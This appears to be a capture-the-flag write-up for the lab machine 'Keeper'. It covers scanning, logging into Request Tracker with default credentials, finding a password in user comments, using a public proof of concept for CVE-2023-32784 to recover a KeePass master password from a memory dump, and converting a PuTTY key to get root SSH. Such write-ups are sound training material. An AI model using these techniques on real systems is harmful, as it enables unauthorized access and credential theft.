Keeper
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 10.129.207.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-13 22:12 +08
Warning: 10.129.207.151 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.207.151
Host is up (0.16s latency).
Not shown: 65393 closed tcp ports (conn-refused), 140 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
We can start proxying traffic through Burpsuite.
Web Enumeration -> SSH Creds
Visiting the website itself shows a domain we need to add:

After adding to the /etc/hosts
file, it brings us to a login page:

The website was running Best Practical Request Tracker (RT) 4.4.4, which is quite outdated. A bit of research reveals that root:password
is the default password, which works here:

There is 1 ticket present, and it's an issue regarding Keepass (with the box name being an obvious hint).

The attachment has been removed. There's also mention of another user named lnorgaard
. When we use the Admin panel to view all Users, there's a password located within the user's comments:

Using these creds, we can ssh
in as the user:

Privilege Escalation
Keepass Dump -> CVE-2023-32784
Within the user's directory, there's one zip
file present:
lnorgaard@keeper:~$ ls
RT30000.zip user.txt
Within it is the .dmp
file for the Keepass client mentioned in the ticket earlier. I searched for Keepass exploits for 2023, and found this one:
This exploits allows us to get passwords from Keepass dump files, and there is one PoC for it:
We can clone the repository and clean it up a bit. Afterwards, use scp
to transfer the file out:
scp lnorgaard@keeper.htb:~/KeePassDumpFull.dmp .
Then, in order to run the binary, I had to change the dependencies from net7.0
to net6.0
within the .csproj
file:
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
</Project>
Afterwards, we can use dotnet run
to execute the program:
$ dotnet run KeePassDumpFull.dmp
Password candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ,, l, `, -, ', ], A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ●
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ●
16.: d,
17.: e,
Combined: ●{,, l, `, -, ', ], A, I, :, =, _, c, M}<REDACTEDSTRING>
This would produce a string at the end with some non-printable characters. Googling part of the string reveals a certain Danish dessert (based on the username of the user):

Using the name of the dessert, we can access the passwords within the .kdbx
file:
$ kpcli --kdb=passcodes.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> ls
=== Groups ===
passcodes/
Keepass PPX Key -> Root SSH Key
There are quite a few entries within this Keepass instance:
kpcli:/passcodes> ls *
/passcodes/eMail:
/passcodes/General:
/passcodes/Homebanking:
/passcodes/Internet:
/passcodes/Network:
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
/passcodes/Recycle Bin:
=== Entries ===
2. Sample Entry keepass.info
3. Sample Entry #2 keepass.info/help/kb/testform.
/passcodes/Windows:
Within the keeper.htb
entry, there's a key of some sorts, as well as a fake password for root
:
kpcli:/passcodes/Network> show -f 0
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: <TRUNCATED>
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
<TRUNCATED>
This is a Putty User Key File, which can be converted back to an ssh
key.
$ puttygen key.ppk -O private-openssh -o sshkey.rsa
$ cat sshkey.rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAp1arHv4TLMBgUULD7AvxMMsSb3PFqbpfw/K4gmVd9GW3xBdP
<TRUNCATED>
After running chmod 600
on it, we can use this private key to ssh
in as root
:

dotnet run
saves loads of time transferring files to a Windows machine. Rooted!
Last updated